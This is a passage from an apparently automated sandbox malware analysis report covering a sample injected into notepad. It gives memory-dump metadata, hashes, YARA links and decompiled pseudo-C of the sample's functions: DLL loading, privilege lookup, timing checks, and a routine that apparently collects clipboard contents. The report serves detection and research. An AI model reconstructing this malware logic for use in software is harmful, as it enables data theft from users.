                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A9FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(__eflags, E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							__eflags = _t50 - 0x62;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E004080E0( &_v24,  &_v840);
							_t55 = _t56 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						_t10 = _t52 + 0x474;
						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E00408160(_t52,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t52 + 0x55c;
						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					_t21 = _t52 + 0x32;
					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                  0x00409abb
                                                  0x00409ac3
                                                  0x00409ac5
                                                  0x00409aca
                                                  0x00409acf
                                                  0x00409ae2
                                                  0x00409ae7
                                                  0x00409af0
                                                  0x00409afc
                                                  0x00409b0f
                                                  0x00409b14
                                                  0x00409b17
                                                  0x00409b20
                                                  0x00409b32
                                                  0x00409b37
                                                  0x00409b3a
                                                  0x00409b3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b3e
                                                  0x00409b3f
                                                  0x00409b42
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b44
                                                  0x00409b51
                                                  0x00409b5c
                                                  0x00409b61
                                                  0x00409b64
                                                  0x00409b66
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00409b66
                                                  0x00409b46
                                                  0x00409b49
                                                  0x00409b49
                                                  0x00409b49
                                                  0x00409b4f
                                                  0x00000000
                                                  0x00409b68
                                                  0x00409b68
                                                  0x00409b68
                                                  0x00409b6c
                                                  0x00409b71
                                                  0x00409b7a
                                                  0x00409b7c
                                                  0x00409b7e
                                                  0x00409b84
                                                  0x00409b88
                                                  0x00409b8b
                                                  0x00409b8b
                                                  0x00409b8b
                                                  0x00409b8b
                                                  0x00409b92
                                                  0x00409b95
                                                  0x00409b9a
                                                  0x00409b9a
                                                  0x00409b9a
                                                  0x00409ba7
                                                  0x00409ad6
                                                  0x00409ad6
                                                  0x00409ad6

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateExitHeapProcess
                                                  • String ID: 6EA
                                                  • API String ID: 1054155344-1400015478
                                                  • Opcode ID: 255655ab164f17740d46e5343843484aa0bdf478bd55110ec30e9b51bc9dcfc8
                                                  • Instruction ID: 2e907044eabaa9d5a8029f8b97c5892acbccb517a4d0db4ef265e5a363abd8cc
                                                  • Opcode Fuzzy Hash: 255655ab164f17740d46e5343843484aa0bdf478bd55110ec30e9b51bc9dcfc8
                                                  • Instruction Fuzzy Hash: F3E0E5711152007BEA20EB54CC80ED33768DF48760F248459F98C5F201C035D9118BE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 11 41a630-41a661 call 41af60 RtlAllocateHeap
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: 6EA
                                                  • API String ID: 1279760036-1400015478
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a480 218->220 221 40838d 218->221 220->221 221->219
                                                  C-Code - Quality: 82%
                                                  			E00408310(void* __ecx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                  0x00408310
                                                  0x0040831f
                                                  0x00408323
                                                  0x0040832e
                                                  0x0040833e
                                                  0x0040834e
                                                  0x00408353
                                                  0x0040835a
                                                  0x0040835d
                                                  0x0040836a
                                                  0x0040836c
                                                  0x0040836e
                                                  0x0040838b
                                                  0x0040838b
                                                  0x00000000
                                                  0x0040838d
                                                  0x00408392

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                  • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 224 40acf0-40ad19 call 41cc50 227 40ad1b-40ad1e 224->227 228 40ad1f-40ad2d call 41d070 224->228 231 40ad3d-40ad4e call 41b4a0 228->231 232 40ad2f-40ad3a call 41d2f0 228->232 237 40ad50-40ad64 LdrLoadDll 231->237 238 40ad67-40ad6a 231->238 232->231 237->238
                                                  C-Code - Quality: 100%
                                                  			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
						E0041D2F0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                  0x0040ad0c
                                                  0x0040ad0f
                                                  0x0040ad14
                                                  0x0040ad19
                                                  0x0040ad23
                                                  0x0040ad28
                                                  0x0040ad2b
                                                  0x0040ad2d
                                                  0x0040ad35
                                                  0x0040ad3a
                                                  0x0040ad3a
                                                  0x0040ad41
                                                  0x0040ad49
                                                  0x0040ad4c
                                                  0x0040ad4e
                                                  0x0040ad62
                                                  0x00000000
                                                  0x0040ad64
                                                  0x0040ad6a
                                                  0x0040ad1e
                                                  0x0040ad1e
                                                  0x0040ad1e

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 245 41a7c2-41a7c6 246 41a7c8-41a7ca 245->246 247 41a7dd-41a7ea call 41af60 245->247 249 41a832-41a840 246->249 250 41a7cc-41a7db 246->250 251 41a7ef-41a804 LookupPrivilegeValueW 247->251 250->247
                                                  C-Code - Quality: 20%
                                                  			E0041A7C2(signed int __eax, signed int __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t15;
				void* _t20;
				void* _t23;
				intOrPtr* _t24;
				void* _t28;
				void* _t30;

				asm("jecxz 0x17");
				asm("repne lodsd");
				if((__eax ^ 0x000000d7) != 0) {
					return  *((intOrPtr*)( *_t24))(_a12, _t20);
				} else {
					_t30 = _t28 - __ecx;
					 *0x8bec8b55 =  *0x8bec8b55 | __ecx;
					_push(_t30);
					E0041AF60(_t23, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, _t24);
					_t15 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					return _t15;
				}
			}









                                                  0x0041a7c6
                                                  0x0041a7c8
                                                  0x0041a7ca
                                                  0x0041a840
                                                  0x0041a7cc
                                                  0x0041a7cc
                                                  0x0041a7ce
                                                  0x0041a7d0
                                                  0x0041a7ea
                                                  0x0041a800
                                                  0x0041a804
                                                  0x0041a804

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 555316f20e3ebc16c8b5ba02437ec63076d32a3147c768f9d146e1e6745065f6
                                                  • Instruction ID: 45369d00f35f910a4a80ceb0d1db3ea5d15078f9f006c9d75f8f5068cdbb57f7
                                                  • Opcode Fuzzy Hash: 555316f20e3ebc16c8b5ba02437ec63076d32a3147c768f9d146e1e6745065f6
                                                  • Instruction Fuzzy Hash: E8F024B52452442FDB04EF68DC81EE77BA8DF81310F14846EFD8E4B342D134EA21C6A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 259 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 262 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);
			}





                                                  0x0041a6ca
                                                  0x0041a6d8

                                                  APIs
                                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00407B44 Relevance: 6.4, Strings: 5, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 42%
                                                  			E00407B44(void* __eax, void* __ebx, intOrPtr* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				short _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v38;
				short _v42;
				short _v46;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				void* __edi;
				void* __ebp;
				void* _t40;
				void* _t51;
				void* _t60;
				void* _t65;
				void* _t75;
				intOrPtr _t78;
				void* _t81;
				void* _t88;
				void* _t89;
				void* _t91;
				void* _t96;

				_t81 = __eax;
				asm("in eax, dx");
				asm("int1");
				asm("std");
				_t65 = __ecx +  *__ecx;
				_t60 = __ebx + __esi;
				_t96 = _t60;
				asm("sti");
				if(_t96 >= 0) {
					if (_t96 >= 0) goto L8;
					asm("loop 0x69");
					asm("arpl bp, ax");
					asm("adc eax, 0x469e9349");
					return 1;
				} else {
					__eax = 0x8bec8b55;
					__ebp = __esp;
					__eax = _a8;
					__esp = __esp - 0x40;
					__eax = E0041C0D0(_a8);
					if(__eax <= 0x1000) {
						_push(__ebx);
						_push(__esi);
						__esi = _a4;
						__ebx =  *((intOrPtr*)(_a4 + 0x7d8));
						_v8 = __ebx;
						if(__ebx != 0) {
							__ecx = _a8;
							__edi = __eax + __eax;
							_t61 = _t60 + 0x1fb440;
							_t40 = E0041C0F0(_t65, _t60 + 0x1fb440, _t75);
							_t89 = _t88 + 0xc;
							if(_t40 == 0) {
								E0041BDE0(_t61, _a8, _t75);
								_t91 = _t89 + 0xc;
								_v12 = 0;
								_t77 = _t81 + 0x11860;
								_v20 = 0xa000d;
								_v16 = 0xa000d;
								_v68 = 0x6c0043;
								_v64 = 0x700069;
								_v60 = 0x6f0062;
								_v56 = 0x720061;
								_v52 = 0x64;
								_v48 = 0;
								_v46 = 0;
								_v42 = 0;
								_v38 = 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xcc0))))(_t81 + 0x11860, 0x104);
								 *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xcbc))))(0);
								if(0 <= 0x40) {
									if(0 == 0) {
										_v36 = 0x6e0055;
										_v32 = 0x6e006b;
										_v28 = 0x77006f;
										_v24 = 0x6e;
										E0041BDE0(_t77,  &_v36, 0x10);
										_t91 = _t91 + 0xc;
									}
								} else {
									 *((short*)(_t81 + 0x118e0)) = 0;
								}
								_t83 = _t81 + 0x120e0;
								E0041BDE0(_t81 + 0x120e0,  &_v68, 0x14);
								E0041C240(_t81 + 0x120e0,  &_v20, 0);
								E0041C240(_t83, _t77, 0);
								E0041C240(_t83,  &_v20, 0);
								E0041C240(_t83, _a8, 0);
								_t51 = E0041C0D0(_t83);
								_t78 = _v8;
								 *((intOrPtr*)(_t78 + 0x208c)) = _t51 + _t51;
								_t40 = E0041BDE0(_t78 + 0x2094, _t83, E0041C0D0(_t83) + _t53);
								 *((intOrPtr*)(_t78 + 0x2090)) = 1;
							}
						}
					}
					return _t40;
				}
			}

































                                                  0x00407b44
                                                  0x00407b45
